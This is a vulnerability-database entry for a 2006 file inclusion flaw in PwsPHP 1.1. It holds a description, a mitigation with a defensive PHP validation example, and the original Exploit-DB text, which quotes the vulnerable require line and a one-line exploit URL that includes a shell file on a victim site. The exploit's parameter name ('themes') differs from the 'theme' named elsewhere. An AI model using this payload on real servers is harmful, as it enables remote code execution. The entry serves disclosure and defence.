Vendor: PwsPHP
By: Dr Max Virus
CVSS: 8,8 (HIGH)
File Inclusion Vulnerability
CWE: 22
Product Name: PwsPHP
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:pwsphp:pwsphp:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PwsPHP v1.1 (theme) File inclusion Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'theme' parameter to '/themes/fin.php' script. This can be exploited to include arbitrary files from local resources via directory traversal attacks and URL-encoded NULL bytes.

Mitigation:

Validate and sanitize user-supplied input, in particular the 'theme' value, before it is used to build the path of an included file.
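
One way to apply this mitigation to the require ("$theme/fin.php") pattern, as an added example (not PwsPHP code and not the vendor's patch): the theme name is restricted to a strict pattern and the resolved path is confirmed to stay under the themes directory before it is used. The function name resolve_theme, the name pattern and the temporary directory layout are assumptions.

```php
<?php
// Added example (not PwsPHP code): validate a theme name and resolve it to a
// file under the themes root before require. Names and layout are hypothetical.

function resolve_theme(string $requested, string $themesRoot): ?string
{
    // Accept plain directory names only: no slashes, dots, NUL bytes, schemes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)) {
        return null;
    }
    $root = realpath($themesRoot);
    $file = realpath($themesRoot . '/' . $requested . '/fin.php');
    if ($root === false || $file === false) {
        return null; // no such theme, or it has no fin.php
    }
    // Containment: the resolved file must sit under the themes root, which
    // also rejects a theme directory that is a symlink to somewhere else.
    $prefix = $root . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0 ? $file : null;
}

// Constructed sample layout in a temp directory so the script runs offline.
$root = sys_get_temp_dir() . '/themes_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/default', 0700, true);
file_put_contents($root . '/default/fin.php', "<?php // footer\n");

// Constructed inputs: one valid name, then values the check must refuse.
$samples = ['default', 'missing', '../../etc', "default\0", 'http://example.invalid/x'];

foreach ($samples as $theme) {
    $path = resolve_theme($theme, $root);
    printf("%-28s => %s\n", json_encode($theme), $path === null ? 'rejected' : 'accepted');
    // In the application: require $path when non-null, else use a fixed default.
}

// Remove the constructed files again.
unlink($root . '/default/fin.php');
rmdir($root . '/default');
rmdir($root);
```

Only the first sample is accepted; the others fail either the name pattern or the existence check, so no request-controlled string ever reaches require directly.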

Exploit-DB raw data:

==========================================================================================================================
PwsPHP v1.1 (theme) File inclusion Vulnerability
===============================================
Script:PwsPHP
=============
Version:1.1
=============
script site:http://www.pwsphp.com
=================================
Author:Dr Max Virus
=======================================
Bug in;
themes/fin.php
==============
Vul Code:
require ("$theme/fin.php")
==========================
Exploit:
www.victim.com/script_path/themes/fin.php?themes=shell.txt?
===========================================================
Gr33Ts:str0ke-the master-Thehacker-NETTOXIC-ShiKAa-xoron-0xygen-All Ayyildiz Team-All My Friends
================================================================================================
http://www.comscripts.com/scripts/php.pwsphp.1517.html
================================================================================================

# milw0rm.com [2006-10-31]